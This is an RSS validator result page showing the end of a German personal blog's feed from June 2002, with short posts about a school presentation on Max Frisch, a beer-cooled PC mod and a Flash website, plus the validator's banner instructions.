  17036.    <pubDate>Tue, 04 Jun 2002 01:49:00 +0000</pubDate>
  17037.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  17038.    <description><![CDATA[Endlich! Nach <b>langer</b> und <b>harter</b> Arbeit ist mein 15-Minuten-Referat über das Stück Santa Cruz von Max Frisch fertig.<br><br>Zur Belohnung gibt es einen Einblick in meine Lieblingsstadt (leider nur für IE-Benutzer):<br>
  17039. <a href="javascript:var cam = window.open('https://blog.x-way.org/stuff/paris-cam.htm','cam','directories=no,fullscreen=no,height=291,innerHeight=291,innerWidth=358,location=no,menubar=no,personalbar=no,resizable=yes,scrollbars=no,status=no,toolbar=no,titlebar=no,width=358');">Klick!</a>
  17040. ]]></description>
  17041.    <content:encoded><![CDATA[Endlich! Nach <b>langer</b> und <b>harter</b> Arbeit ist mein 15-Minuten-Referat über das Stück Santa Cruz von Max Frisch fertig.<br><br>Zur Belohnung gibt es einen Einblick in meine Lieblingsstadt (leider nur für IE-Benutzer):<br>
  17042. <a href="javascript:var cam = window.open('https://blog.x-way.org/stuff/paris-cam.htm','cam','directories=no,fullscreen=no,height=291,innerHeight=291,innerWidth=358,location=no,menubar=no,personalbar=no,resizable=yes,scrollbars=no,status=no,toolbar=no,titlebar=no,width=358');">Klick!</a>
  17043. ]]></content:encoded>
  17044.  </item>
  17045.  
  17046.  <item>
  17047.    <title>Bier-Computer</title>
  17048.    <link>https://blog.x-way.org/Misc/2002/06/03/Bier-Computer.html</link>
  17049.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=3</guid>
  17050.    <dc:creator>Andreas Jaggi</dc:creator>
  17051.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  17052.    <pubDate>Mon, 03 Jun 2002 16:14:00 +0000</pubDate>
  17053.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  17054.    <description><![CDATA[Bei diesem Modell ist die <b>*Kühlung*</b> sicher kein Problem. Jedenfalls für den Benutzer. ;-)<br><br><img src="https://blog.x-way.org/images/beerpc.jpg" width="246" height="350" style="border: 1px solid #454545;" alt="Bier-Computer"><br><br>Gefunden bei <a href="https://web.archive.org/web/20020711232045/http://www.hitechmods.com/gallery/page13/page13.shtml" target="_blank">http://www.hitechmods.com/gallery/page13/page13.shtml</a>
  17055. ]]></description>
  17056.    <content:encoded><![CDATA[Bei diesem Modell ist die <b>*Kühlung*</b> sicher kein Problem. Jedenfalls für den Benutzer. ;-)<br><br><img src="https://blog.x-way.org/images/beerpc.jpg" width="246" height="350" style="border: 1px solid #454545;" alt="Bier-Computer"><br><br>Gefunden bei <a href="https://web.archive.org/web/20020711232045/http://www.hitechmods.com/gallery/page13/page13.shtml" target="_blank">http://www.hitechmods.com/gallery/page13/page13.shtml</a>
  17057. ]]></content:encoded>
  17058.  </item>
  17059.  
  17060.  <item>
  17061.    <title>Flash-Sites</title>
  17062.    <link>https://blog.x-way.org/Webdesign/2002/06/03/Flash-Sites.html</link>
  17063.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=2</guid>
  17064.    <dc:creator>Andreas Jaggi</dc:creator>
  17065.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  17066.    <pubDate>Mon, 03 Jun 2002 08:50:00 +0000</pubDate>
  17067.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  17068.    <description><![CDATA[Beim (<b>*unerlaubten*</b>) Surfen aufgefallen:<br><a href="http://www.2advanced.com">http://www.2advanced.com</a>
  17069. ]]></description>
  17070.    <content:encoded><![CDATA[Beim (<b>*unerlaubten*</b>) Surfen aufgefallen:<br><a href="http://www.2advanced.com">http://www.2advanced.com</a>
  17071. ]]></content:encoded>
  17072.  </item>
  17073.  
  17074. </channel>
  17075. </rss>
  17076.  

If you would like to create a banner that links to this page (i.e. this validation result), do the following:

  1. Download the "valid RSS" banner.

  2. Upload the image to your own server. (This step is important. Please do not link directly to the image on this server.)

  3. Add this HTML to your page (change the image src attribute if necessary):

If you would like to create a text link instead, here is the URL you can use:

http://www.rssboard.org/rss-validator/check.cgi?url=http%3A//blog.x-way.org/rss.xml

Software created by Sam Ruby, Mark Pilgrim, Joseph Walton and Phil Ringnalda